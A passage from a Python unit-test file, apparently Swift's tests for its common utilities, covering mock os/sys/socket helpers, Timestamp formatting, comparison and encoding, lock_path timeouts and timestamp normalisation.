raise OSError()
def dup2(self, source, target):
self.closed_fds.append(target)
def geteuid(self):
'''Pretend we are running as root.'''
return 0
def __getattr__(self, name):
# I only over-ride portions of the os module
try:
return object.__getattr__(self, name)
except AttributeError:
return getattr(os, name)
class MockUdpSocket(object):
def __init__(self, sendto_errno=None):
self.sent = []
self.sendto_errno = sendto_errno
def sendto(self, data, target):
if self.sendto_errno:
raise socket.error(self.sendto_errno,
'test errno %s' % self.sendto_errno)
self.sent.append((data, target))
def close(self):
pass
class MockSys(object):
def __init__(self):
self.stdin = TemporaryFile('w')
self.stdout = TemporaryFile('r')
self.stderr = TemporaryFile('r')
self.__stderr__ = self.stderr
self.stdio_fds = [self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()]
def reset_loggers():
if hasattr(utils.get_logger, 'handler4logger'):
for logger, handler in utils.get_logger.handler4logger.items():
logger.removeHandler(handler)
delattr(utils.get_logger, 'handler4logger')
if hasattr(utils.get_logger, 'console_handler4logger'):
for logger, h in utils.get_logger.console_handler4logger.items():
logger.removeHandler(h)
delattr(utils.get_logger, 'console_handler4logger')
# Reset the LogAdapter class thread local state. Use get_logger() here
# to fetch a LogAdapter instance because the items from
# get_logger.handler4logger above are the underlying logger instances,
# not the LogAdapter.
utils.get_logger(None).thread_locals = (None, None)
def reset_logger_state(f):
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
reset_loggers()
try:
return f(self, *args, **kwargs)
finally:
reset_loggers()
return wrapper
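# reset_logger_state is intended to wrap individual test methods so that handler
# and thread-local logger state is reset before and after the test, e.g.
# (hypothetical test shown):
#   @reset_logger_state
#   def test_logging_behaviour(self):
#       ...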
class TestTimestamp(unittest.TestCase):
"""Tests for swift.common.utils.Timestamp"""
def test_invalid_input(self):
self.assertRaises(ValueError, utils.Timestamp, time.time(), offset=-1)
def test_invalid_string_conversion(self):
t = utils.Timestamp(time.time())
self.assertRaises(TypeError, str, t)
def test_offset_limit(self):
t = 1417462430.78693
        # can't have an offset above MAX_OFFSET
self.assertRaises(ValueError, utils.Timestamp, t,
offset=utils.MAX_OFFSET + 1)
# exactly max offset is fine
ts = utils.Timestamp(t, offset=utils.MAX_OFFSET)
self.assertEqual(ts.internal, '1417462430.78693_ffffffffffffffff')
# but you can't offset it further
self.assertRaises(ValueError, utils.Timestamp, ts.internal, offset=1)
# unless you start below it
ts = utils.Timestamp(t, offset=utils.MAX_OFFSET - 1)
self.assertEqual(utils.Timestamp(ts.internal, offset=1),
'1417462430.78693_ffffffffffffffff')
def test_normal_format_no_offset(self):
expected = '1402436408.91203'
test_values = (
'1402436408.91203',
'1402436408.91203_00000000',
'1402436408.912030000',
'1402436408.912030000_0000000000000',
'000001402436408.912030000',
'000001402436408.912030000_0000000000',
1402436408.91203,
1402436408.912029,
1402436408.9120300000000000,
1402436408.91202999999999999,
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.912029),
utils.Timestamp(1402436408.912029, offset=0),
utils.Timestamp('1402436408.91203'),
utils.Timestamp('1402436408.91203', offset=0),
utils.Timestamp('1402436408.91203_00000000'),
utils.Timestamp('1402436408.91203_00000000', offset=0),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(timestamp.normal, expected)
# timestamp instance can also compare to string or float
self.assertEqual(timestamp, expected)
self.assertEqual(timestamp, float(expected))
self.assertEqual(timestamp, utils.normalize_timestamp(expected))
def test_isoformat(self):
expected = '2014-06-10T22:47:32.054580'
test_values = (
'1402440452.05458',
'1402440452.054579',
'1402440452.05458_00000000',
'1402440452.054579_00000000',
'1402440452.054580000',
'1402440452.054579999',
'1402440452.054580000_0000000000000',
'1402440452.054579999_0000ff00',
'000001402440452.054580000',
'000001402440452.0545799',
'000001402440452.054580000_0000000000',
'000001402440452.054579999999_00000fffff',
1402440452.05458,
1402440452.054579,
1402440452.0545800000000000,
1402440452.054579999,
utils.Timestamp(1402440452.05458),
utils.Timestamp(1402440452.0545799),
utils.Timestamp(1402440452.05458, offset=0),
utils.Timestamp(1402440452.05457999999, offset=0),
utils.Timestamp(1402440452.05458, offset=100),
utils.Timestamp(1402440452.054579, offset=100),
utils.Timestamp('1402440452.05458'),
utils.Timestamp('1402440452.054579999'),
utils.Timestamp('1402440452.05458', offset=0),
utils.Timestamp('1402440452.054579', offset=0),
utils.Timestamp('1402440452.05458', offset=300),
utils.Timestamp('1402440452.05457999', offset=300),
utils.Timestamp('1402440452.05458_00000000'),
utils.Timestamp('1402440452.05457999_00000000'),
utils.Timestamp('1402440452.05458_00000000', offset=0),
utils.Timestamp('1402440452.05457999_00000aaa', offset=0),
utils.Timestamp('1402440452.05458_00000000', offset=400),
utils.Timestamp('1402440452.054579_0a', offset=400),
)
for value in test_values:
self.assertEqual(utils.Timestamp(value).isoformat, expected)
expected = '1970-01-01T00:00:00.000000'
test_values = (
'0',
'0000000000.00000',
'0000000000.00000_ffffffffffff',
0,
0.0,
)
for value in test_values:
self.assertEqual(utils.Timestamp(value).isoformat, expected)
def test_not_equal(self):
ts = '1402436408.91203_0000000000000001'
test_values = (
utils.Timestamp('1402436408.91203_0000000000000002'),
utils.Timestamp('1402436408.91203'),
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91204),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.91203, offset=2),
)
for value in test_values:
self.assertTrue(value != ts)
self.assertIs(True, utils.Timestamp(ts) == ts) # sanity
self.assertIs(False, utils.Timestamp(ts) != utils.Timestamp(ts))
self.assertIs(False, utils.Timestamp(ts) != ts)
self.assertIs(False, utils.Timestamp(ts) is None)
self.assertIs(True, utils.Timestamp(ts) is not None)
def test_no_force_internal_no_offset(self):
"""Test that internal is the same as normal with no offset"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(utils.Timestamp(0).internal, '0000000000.00000')
self.assertEqual(utils.Timestamp(1402437380.58186).internal,
'1402437380.58186')
self.assertEqual(utils.Timestamp(1402437380.581859).internal,
'1402437380.58186')
self.assertEqual(utils.Timestamp(0).internal,
utils.normalize_timestamp(0))
def test_no_force_internal_with_offset(self):
"""Test that internal always includes the offset if significant"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(utils.Timestamp(0, offset=1).internal,
'0000000000.00000_0000000000000001')
self.assertEqual(
utils.Timestamp(1402437380.58186, offset=16).internal,
'1402437380.58186_0000000000000010')
self.assertEqual(
utils.Timestamp(1402437380.581859, offset=240).internal,
'1402437380.58186_00000000000000f0')
self.assertEqual(
utils.Timestamp('1402437380.581859_00000001',
offset=240).internal,
'1402437380.58186_00000000000000f1')
def test_force_internal(self):
"""Test that internal always includes the offset if forced"""
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=True):
self.assertEqual(utils.Timestamp(0).internal,
'0000000000.00000_0000000000000000')
self.assertEqual(utils.Timestamp(1402437380.58186).internal,
'1402437380.58186_0000000000000000')
self.assertEqual(utils.Timestamp(1402437380.581859).internal,
'1402437380.58186_0000000000000000')
self.assertEqual(utils.Timestamp(0, offset=1).internal,
'0000000000.00000_0000000000000001')
self.assertEqual(
utils.Timestamp(1402437380.58186, offset=16).internal,
'1402437380.58186_0000000000000010')
self.assertEqual(
utils.Timestamp(1402437380.581859, offset=16).internal,
'1402437380.58186_0000000000000010')
def test_internal_format_no_offset(self):
expected = '1402436408.91203_0000000000000000'
test_values = (
'1402436408.91203',
'1402436408.91203_00000000',
'1402436408.912030000',
'1402436408.912030000_0000000000000',
'000001402436408.912030000',
'000001402436408.912030000_0000000000',
1402436408.91203,
1402436408.9120300000000000,
1402436408.912029,
1402436408.912029999999999999,
utils.Timestamp(1402436408.91203),
utils.Timestamp(1402436408.91203, offset=0),
utils.Timestamp(1402436408.912029),
utils.Timestamp(1402436408.91202999999999999, offset=0),
utils.Timestamp('1402436408.91203'),
utils.Timestamp('1402436408.91203', offset=0),
utils.Timestamp('1402436408.912029'),
utils.Timestamp('1402436408.912029', offset=0),
utils.Timestamp('1402436408.912029999999999'),
utils.Timestamp('1402436408.912029999999999', offset=0),
)
for value in test_values:
# timestamp instance is always equivalent
self.assertEqual(utils.Timestamp(value), expected)
if utils.FORCE_INTERNAL:
# the FORCE_INTERNAL flag makes the internal format always
# include the offset portion of the timestamp even when it's
# not significant and would be bad during upgrades
self.assertEqual(utils.Timestamp(value).internal, expected)
else:
# unless we FORCE_INTERNAL, when there's no offset the
# internal format is equivalent to the normalized format
self.assertEqual(utils.Timestamp(value).internal,
'1402436408.91203')
def test_internal_format_with_offset(self):
expected = '1402436408.91203_00000000000000f0'
test_values = (
'1402436408.91203_000000f0',
'1402436408.912030000_0000000000f0',
'1402436408.912029_000000f0',
'1402436408.91202999999_0000000000f0',
'000001402436408.912030000_000000000f0',
'000001402436408.9120299999_000000000f0',
utils.Timestamp(1402436408.91203, offset=240),
utils.Timestamp(1402436408.912029, offset=240),
utils.Timestamp('1402436408.91203', offset=240),
utils.Timestamp('1402436408.91203_00000000', offset=240),
utils.Timestamp('1402436408.91203_0000000f', offset=225),
utils.Timestamp('1402436408.9120299999', offset=240),
utils.Timestamp('1402436408.9120299999_00000000', offset=240),
utils.Timestamp('1402436408.9120299999_00000010', offset=224),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(timestamp.internal, expected)
# can compare with offset if the string is internalized
self.assertEqual(timestamp, expected)
# if comparison value only includes the normalized portion and the
# timestamp includes an offset, it is considered greater
normal = utils.Timestamp(expected).normal
self.assertTrue(timestamp > normal,
'%r is not bigger than %r given %r' % (
timestamp, normal, value))
self.assertTrue(timestamp > float(normal),
'%r is not bigger than %f given %r' % (
timestamp, float(normal), value))
def test_short_format_with_offset(self):
expected = '1402436408.91203_f0'
timestamp = utils.Timestamp(1402436408.91203, 0xf0)
self.assertEqual(expected, timestamp.short)
expected = '1402436408.91203'
timestamp = utils.Timestamp(1402436408.91203)
self.assertEqual(expected, timestamp.short)
def test_raw(self):
expected = 140243640891203
timestamp = utils.Timestamp(1402436408.91203)
self.assertEqual(expected, timestamp.raw)
# 'raw' does not include offset
timestamp = utils.Timestamp(1402436408.91203, 0xf0)
self.assertEqual(expected, timestamp.raw)
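    # Inferred from the expected values above and in test_delta below: raw
    # appears to be the timestamp expressed in units of 1e-5 seconds, and the
    # delta keyword shifts the value in those same units.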
def test_delta(self):
def _assertWithinBounds(expected, timestamp):
tolerance = 0.00001
minimum = expected - tolerance
maximum = expected + tolerance
self.assertTrue(float(timestamp) > minimum)
self.assertTrue(float(timestamp) < maximum)
timestamp = utils.Timestamp(1402436408.91203, delta=100)
_assertWithinBounds(1402436408.91303, timestamp)
self.assertEqual(140243640891303, timestamp.raw)
timestamp = utils.Timestamp(1402436408.91203, delta=-100)
_assertWithinBounds(1402436408.91103, timestamp)
self.assertEqual(140243640891103, timestamp.raw)
timestamp = utils.Timestamp(1402436408.91203, delta=0)
_assertWithinBounds(1402436408.91203, timestamp)
self.assertEqual(140243640891203, timestamp.raw)
# delta is independent of offset
timestamp = utils.Timestamp(1402436408.91203, offset=42, delta=100)
self.assertEqual(140243640891303, timestamp.raw)
self.assertEqual(42, timestamp.offset)
# cannot go negative
self.assertRaises(ValueError, utils.Timestamp, 1402436408.91203,
delta=-140243640891203)
def test_int(self):
expected = 1402437965
test_values = (
'1402437965.91203',
'1402437965.91203_00000000',
'1402437965.912030000',
'1402437965.912030000_0000000000000',
'000001402437965.912030000',
'000001402437965.912030000_0000000000',
1402437965.91203,
1402437965.9120300000000000,
1402437965.912029,
1402437965.912029999999999999,
utils.Timestamp(1402437965.91203),
utils.Timestamp(1402437965.91203, offset=0),
utils.Timestamp(1402437965.91203, offset=500),
utils.Timestamp(1402437965.912029),
utils.Timestamp(1402437965.91202999999999999, offset=0),
utils.Timestamp(1402437965.91202999999999999, offset=300),
utils.Timestamp('1402437965.91203'),
utils.Timestamp('1402437965.91203', offset=0),
utils.Timestamp('1402437965.91203', offset=400),
utils.Timestamp('1402437965.912029'),
utils.Timestamp('1402437965.912029', offset=0),
utils.Timestamp('1402437965.912029', offset=200),
utils.Timestamp('1402437965.912029999999999'),
utils.Timestamp('1402437965.912029999999999', offset=0),
utils.Timestamp('1402437965.912029999999999', offset=100),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(int(timestamp), expected)
self.assertTrue(timestamp > expected)
def test_float(self):
expected = 1402438115.91203
test_values = (
'1402438115.91203',
'1402438115.91203_00000000',
'1402438115.912030000',
'1402438115.912030000_0000000000000',
'000001402438115.912030000',
'000001402438115.912030000_0000000000',
1402438115.91203,
1402438115.9120300000000000,
1402438115.912029,
1402438115.912029999999999999,
utils.Timestamp(1402438115.91203),
utils.Timestamp(1402438115.91203, offset=0),
utils.Timestamp(1402438115.91203, offset=500),
utils.Timestamp(1402438115.912029),
utils.Timestamp(1402438115.91202999999999999, offset=0),
utils.Timestamp(1402438115.91202999999999999, offset=300),
utils.Timestamp('1402438115.91203'),
utils.Timestamp('1402438115.91203', offset=0),
utils.Timestamp('1402438115.91203', offset=400),
utils.Timestamp('1402438115.912029'),
utils.Timestamp('1402438115.912029', offset=0),
utils.Timestamp('1402438115.912029', offset=200),
utils.Timestamp('1402438115.912029999999999'),
utils.Timestamp('1402438115.912029999999999', offset=0),
utils.Timestamp('1402438115.912029999999999', offset=100),
)
tolerance = 0.00001
minimum = expected - tolerance
maximum = expected + tolerance
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertTrue(float(timestamp) > minimum,
'%f is not bigger than %f given %r' % (
timestamp, minimum, value))
self.assertTrue(float(timestamp) < maximum,
'%f is not smaller than %f given %r' % (
timestamp, maximum, value))
# direct comparison of timestamp works too
self.assertTrue(timestamp > minimum,
'%s is not bigger than %f given %r' % (
timestamp.normal, minimum, value))
self.assertTrue(timestamp < maximum,
'%s is not smaller than %f given %r' % (
timestamp.normal, maximum, value))
# ... even against strings
self.assertTrue(timestamp > '%f' % minimum,
'%s is not bigger than %s given %r' % (
timestamp.normal, minimum, value))
self.assertTrue(timestamp < '%f' % maximum,
'%s is not smaller than %s given %r' % (
timestamp.normal, maximum, value))
def test_false(self):
self.assertFalse(utils.Timestamp(0))
self.assertFalse(utils.Timestamp(0, offset=0))
self.assertFalse(utils.Timestamp('0'))
self.assertFalse(utils.Timestamp('0', offset=0))
self.assertFalse(utils.Timestamp(0.0))
self.assertFalse(utils.Timestamp(0.0, offset=0))
self.assertFalse(utils.Timestamp('0.0'))
self.assertFalse(utils.Timestamp('0.0', offset=0))
self.assertFalse(utils.Timestamp(00000000.00000000))
self.assertFalse(utils.Timestamp(00000000.00000000, offset=0))
self.assertFalse(utils.Timestamp('00000000.00000000'))
self.assertFalse(utils.Timestamp('00000000.00000000', offset=0))
def test_true(self):
self.assertTrue(utils.Timestamp(1))
self.assertTrue(utils.Timestamp(1, offset=1))
self.assertTrue(utils.Timestamp(0, offset=1))
self.assertTrue(utils.Timestamp('1'))
self.assertTrue(utils.Timestamp('1', offset=1))
self.assertTrue(utils.Timestamp('0', offset=1))
self.assertTrue(utils.Timestamp(1.1))
self.assertTrue(utils.Timestamp(1.1, offset=1))
self.assertTrue(utils.Timestamp(0.0, offset=1))
self.assertTrue(utils.Timestamp('1.1'))
self.assertTrue(utils.Timestamp('1.1', offset=1))
self.assertTrue(utils.Timestamp('0.0', offset=1))
self.assertTrue(utils.Timestamp(11111111.11111111))
self.assertTrue(utils.Timestamp(11111111.11111111, offset=1))
self.assertTrue(utils.Timestamp(00000000.00000000, offset=1))
self.assertTrue(utils.Timestamp('11111111.11111111'))
self.assertTrue(utils.Timestamp('11111111.11111111', offset=1))
self.assertTrue(utils.Timestamp('00000000.00000000', offset=1))
def test_greater_no_offset(self):
now = time.time()
older = now - 1
timestamp = utils.Timestamp(now)
test_values = (
0, '0', 0.0, '0.0', '0000.0000', '000.000_000',
1, '1', 1.1, '1.1', '1111.1111', '111.111_111',
1402443112.213252, '1402443112.213252', '1402443112.213252_ffff',
older, '%f' % older, '%f_0000ffff' % older,
)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp > value,
'%r is not greater than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp > other,
'%r is not greater than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp > other.normal,
'%r is not greater than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp > other.internal,
'%r is not greater than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp > float(other),
'%r is not greater than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp > int(other),
'%r is not greater than %r given %r' % (
timestamp, int(other), value))
def test_greater_with_offset(self):
now = time.time()
older = now - 1
test_values = (
0, '0', 0.0, '0.0', '0000.0000', '000.000_000',
1, '1', 1.1, '1.1', '1111.1111', '111.111_111',
1402443346.935174, '1402443346.93517', '1402443346.935169_ffff',
older, '%f' % older, '%f_0000ffff' % older,
now, '%f' % now, '%f_00000000' % now,
)
for offset in range(1, 1000, 100):
timestamp = utils.Timestamp(now, offset=offset)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp > value,
'%r is not greater than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp > other,
'%r is not greater than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp > other.normal,
'%r is not greater than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp > other.internal,
'%r is not greater than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp > float(other),
'%r is not greater than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp > int(other),
'%r is not greater than %r given %r' % (
timestamp, int(other), value))
def test_smaller_no_offset(self):
now = time.time()
newer = now + 1
timestamp = utils.Timestamp(now)
test_values = (
9999999999.99999, '9999999999.99999', '9999999999.99999_ffff',
newer, '%f' % newer, '%f_0000ffff' % newer,
)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp < value,
'%r is not smaller than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp < other,
'%r is not smaller than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp < other.normal,
'%r is not smaller than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp < other.internal,
'%r is not smaller than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp < float(other),
'%r is not smaller than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp < int(other),
'%r is not smaller than %r given %r' % (
timestamp, int(other), value))
def test_smaller_with_offset(self):
now = time.time()
newer = now + 1
test_values = (
9999999999.99999, '9999999999.99999', '9999999999.99999_ffff',
newer, '%f' % newer, '%f_0000ffff' % newer,
)
for offset in range(1, 1000, 100):
timestamp = utils.Timestamp(now, offset=offset)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp < value,
'%r is not smaller than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp < other,
'%r is not smaller than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp < other.normal,
'%r is not smaller than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp < other.internal,
'%r is not smaller than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp < float(other),
'%r is not smaller than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp < int(other),
'%r is not smaller than %r given %r' % (
timestamp, int(other), value))
def test_cmp_with_none(self):
self.assertGreater(utils.Timestamp(0), None)
self.assertGreater(utils.Timestamp(1.0), None)
self.assertGreater(utils.Timestamp(1.0, 42), None)
def test_ordering(self):
given = [
'1402444820.62590_000000000000000a',
'1402444820.62589_0000000000000001',
'1402444821.52589_0000000000000004',
'1402444920.62589_0000000000000004',
'1402444821.62589_000000000000000a',
'1402444821.72589_000000000000000a',
'1402444920.62589_0000000000000002',
'1402444820.62589_0000000000000002',
'1402444820.62589_000000000000000a',
'1402444820.62590_0000000000000004',
'1402444920.62589_000000000000000a',
'1402444820.62590_0000000000000002',
'1402444821.52589_0000000000000002',
'1402444821.52589_0000000000000000',
'1402444920.62589',
'1402444821.62589_0000000000000004',
'1402444821.72589_0000000000000001',
'1402444820.62590',
'1402444820.62590_0000000000000001',
'1402444820.62589_0000000000000004',
'1402444821.72589_0000000000000000',
'1402444821.52589_000000000000000a',
'1402444821.72589_0000000000000004',
'1402444821.62589',
'1402444821.52589_0000000000000001',
'1402444821.62589_0000000000000001',
'1402444821.62589_0000000000000002',
'1402444821.72589_0000000000000002',
'1402444820.62589',
'1402444920.62589_0000000000000001']
expected = [
'1402444820.62589',
'1402444820.62589_0000000000000001',
'1402444820.62589_0000000000000002',
'1402444820.62589_0000000000000004',
'1402444820.62589_000000000000000a',
'1402444820.62590',
'1402444820.62590_0000000000000001',
'1402444820.62590_0000000000000002',
'1402444820.62590_0000000000000004',
'1402444820.62590_000000000000000a',
'1402444821.52589',
'1402444821.52589_0000000000000001',
'1402444821.52589_0000000000000002',
'1402444821.52589_0000000000000004',
'1402444821.52589_000000000000000a',
'1402444821.62589',
'1402444821.62589_0000000000000001',
'1402444821.62589_0000000000000002',
'1402444821.62589_0000000000000004',
'1402444821.62589_000000000000000a',
'1402444821.72589',
'1402444821.72589_0000000000000001',
'1402444821.72589_0000000000000002',
'1402444821.72589_0000000000000004',
'1402444821.72589_000000000000000a',
'1402444920.62589',
'1402444920.62589_0000000000000001',
'1402444920.62589_0000000000000002',
'1402444920.62589_0000000000000004',
'1402444920.62589_000000000000000a',
]
# less visual version
"""
now = time.time()
given = [
utils.Timestamp(now + i, offset=offset).internal
for i in (0, 0.00001, 0.9, 1.0, 1.1, 100.0)
for offset in (0, 1, 2, 4, 10)
]
expected = [t for t in given]
random.shuffle(given)
"""
self.assertEqual(len(given), len(expected)) # sanity
timestamps = [utils.Timestamp(t) for t in given]
# our expected values don't include insignificant offsets
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(
[t.internal for t in sorted(timestamps)], expected)
# string sorting works as well
self.assertEqual(
sorted([t.internal for t in timestamps]), expected)
def test_hashable(self):
ts_0 = utils.Timestamp('1402444821.72589')
ts_0_also = utils.Timestamp('1402444821.72589')
self.assertEqual(ts_0, ts_0_also) # sanity
self.assertEqual(hash(ts_0), hash(ts_0_also))
d = {ts_0: 'whatever'}
self.assertIn(ts_0, d) # sanity
self.assertIn(ts_0_also, d)
class TestTimestampEncoding(unittest.TestCase):
def setUp(self):
t0 = utils.Timestamp(0.0)
t1 = utils.Timestamp(997.9996)
t2 = utils.Timestamp(999)
t3 = utils.Timestamp(1000, 24)
t4 = utils.Timestamp(1001)
t5 = utils.Timestamp(1002.00040)
# encodings that are expected when explicit = False
self.non_explicit_encodings = (
('0000001000.00000_18', (t3, t3, t3)),
('0000001000.00000_18', (t3, t3, None)),
)
# mappings that are expected when explicit = True
self.explicit_encodings = (
('0000001000.00000_18+0+0', (t3, t3, t3)),
('0000001000.00000_18+0', (t3, t3, None)),
)
# mappings that are expected when explicit = True or False
self.encodings = (
('0000001000.00000_18+0+186a0', (t3, t3, t4)),
('0000001000.00000_18+186a0+186c8', (t3, t4, t5)),
('0000001000.00000_18-186a0+0', (t3, t2, t2)),
('0000001000.00000_18+0-186a0', (t3, t3, t2)),
('0000001000.00000_18-186a0-186c8', (t3, t2, t1)),
('0000001000.00000_18', (t3, None, None)),
('0000001000.00000_18+186a0', (t3, t4, None)),
('0000001000.00000_18-186a0', (t3, t2, None)),
('0000001000.00000_18', (t3, None, t1)),
('0000001000.00000_18-5f5e100', (t3, t0, None)),
('0000001000.00000_18+0-5f5e100', (t3, t3, t0)),
('0000001000.00000_18-5f5e100+5f45a60', (t3, t0, t2)),
)
# decodings that are expected when explicit = False
self.non_explicit_decodings = (
('0000001000.00000_18', (t3, t3, t3)),
('0000001000.00000_18+186a0', (t3, t4, t4)),
('0000001000.00000_18-186a0', (t3, t2, t2)),
('0000001000.00000_18+186a0', (t3, t4, t4)),
('0000001000.00000_18-186a0', (t3, t2, t2)),
('0000001000.00000_18-5f5e100', (t3, t0, t0)),
)
# decodings that are expected when explicit = True
self.explicit_decodings = (
('0000001000.00000_18+0+0', (t3, t3, t3)),
('0000001000.00000_18+0', (t3, t3, None)),
('0000001000.00000_18', (t3, None, None)),
('0000001000.00000_18+186a0', (t3, t4, None)),
('0000001000.00000_18-186a0', (t3, t2, None)),
('0000001000.00000_18-5f5e100', (t3, t0, None)),
)
# decodings that are expected when explicit = True or False
self.decodings = (
('0000001000.00000_18+0+186a0', (t3, t3, t4)),
('0000001000.00000_18+186a0+186c8', (t3, t4, t5)),
('0000001000.00000_18-186a0+0', (t3, t2, t2)),
('0000001000.00000_18+0-186a0', (t3, t3, t2)),
('0000001000.00000_18-186a0-186c8', (t3, t2, t1)),
('0000001000.00000_18-5f5e100+5f45a60', (t3, t0, t2)),
)
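        # Inferred from the expectations above: the encoded form starts with the
        # first timestamp in its short form; the second timestamp is appended as
        # a signed hex delta from the first, and the third as a signed hex delta
        # from the second, both in units of 1e-5 seconds (e.g. +186a0 = +100000
        # = +1 second).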
def _assertEqual(self, expected, actual, test):
self.assertEqual(expected, actual,
'Got %s but expected %s for parameters %s'
% (actual, expected, test))
def test_encoding(self):
for test in self.explicit_encodings:
actual = utils.encode_timestamps(test[1][0], test[1][1],
test[1][2], True)
self._assertEqual(test[0], actual, test[1])
for test in self.non_explicit_encodings:
actual = utils.encode_timestamps(test[1][0], test[1][1],
test[1][2], False)
self._assertEqual(test[0], actual, test[1])
for explicit in (True, False):
for test in self.encodings:
actual = utils.encode_timestamps(test[1][0], test[1][1],
test[1][2], explicit)
self._assertEqual(test[0], actual, test[1])
def test_decoding(self):
for test in self.explicit_decodings:
actual = utils.decode_timestamps(test[0], True)
self._assertEqual(test[1], actual, test[0])
for test in self.non_explicit_decodings:
actual = utils.decode_timestamps(test[0], False)
self._assertEqual(test[1], actual, test[0])
for explicit in (True, False):
for test in self.decodings:
actual = utils.decode_timestamps(test[0], explicit)
self._assertEqual(test[1], actual, test[0])
class TestUtils(unittest.TestCase):
"""Tests for swift.common.utils """
def setUp(self):
utils.HASH_PATH_SUFFIX = 'endcap'
utils.HASH_PATH_PREFIX = 'startcap'
def test_lock_path(self):
tmpdir = mkdtemp()
try:
with utils.lock_path(tmpdir, 0.1):
exc = None
success = False
try:
with utils.lock_path(tmpdir, 0.1):
success = True
except LockTimeout as err:
exc = err
self.assertTrue(exc is not None)
self.assertTrue(not success)
finally:
shutil.rmtree(tmpdir)
def test_lock_path_num_sleeps(self):
tmpdir = mkdtemp()
num_short_calls = [0]
exception_raised = [False]
def my_sleep(to_sleep):
if to_sleep == 0.01:
num_short_calls[0] += 1
else:
raise Exception('sleep time changed: %s' % to_sleep)
try:
with mock.patch('swift.common.utils.sleep', my_sleep):
with utils.lock_path(tmpdir):
with utils.lock_path(tmpdir):
pass
except Exception as e:
exception_raised[0] = True
self.assertTrue('sleep time changed' in str(e))
finally:
shutil.rmtree(tmpdir)
self.assertEqual(num_short_calls[0], 11)
self.assertTrue(exception_raised[0])
def test_lock_path_class(self):
tmpdir = mkdtemp()
try:
with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
exc = None
exc2 = None
success = False
try:
with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
success = True
except ReplicationLockTimeout as err:
exc = err
except LockTimeout as err:
exc2 = err
self.assertTrue(exc is not None)
self.assertTrue(exc2 is None)
self.assertTrue(not success)
exc = None
exc2 = None
success = False
try:
with utils.lock_path(tmpdir, 0.1):
success = True
except ReplicationLockTimeout as err:
exc = err
except LockTimeout as err:
exc2 = err
self.assertTrue(exc is None)
self.assertTrue(exc2 is not None)
self.assertTrue(not success)
finally:
shutil.rmtree(tmpdir)
def test_normalize_timestamp(self):
# Test swift.common.utils.normalize_timestamp
self.assertEqual(utils.normalize_timestamp('1253327593.48174'),
"1253327593.48174")
self.assertEqual(utils.normalize_timestamp(1253327593.48174),
"1253327593.48174")
self.assertEqual(utils.normalize_timestamp('1253327593.48'),
"1253327593.48000")
self.assertEqual(utils.normalize_timestamp(1253327593.48),
"1253327593.48000")
self.assertEqual(utils.normalize_timestamp('253327593.48'),
"0253327593.48000")
self.assertEqual(utils.normalize_timestamp(253327593.48),
"0253327593.48000")
self.assertEqual(utils.normalize_timestamp('1253327593'),
"1253327593.00000")
self.assertEqual(utils.normalize_timestamp(1253327593),
"1253327593.00000")
self.assertRaises(ValueError, utils.normalize_timestamp, '')
self.assertRaises(ValueError, utils.normalize_timestamp, 'abc')
def test_normalize_delete_at_timestamp(self):
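        # delete-at timestamps are whole seconds, clamped to the range
        # '0000000000' .. '9999999999'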
self.assertEqual(
utils.normalize_delete_at_timestamp(1253327593),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp(1253327593.67890),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp('1253327593'),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp('1253327593.67890'),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp(-1253327593),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp(-1253327593.67890),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp('-1253327593'),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp('-1253327593.67890'),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp(71253327593),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp(71253327593.67890),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp('71253327593'),
'9999999999')
self.assertEqual(
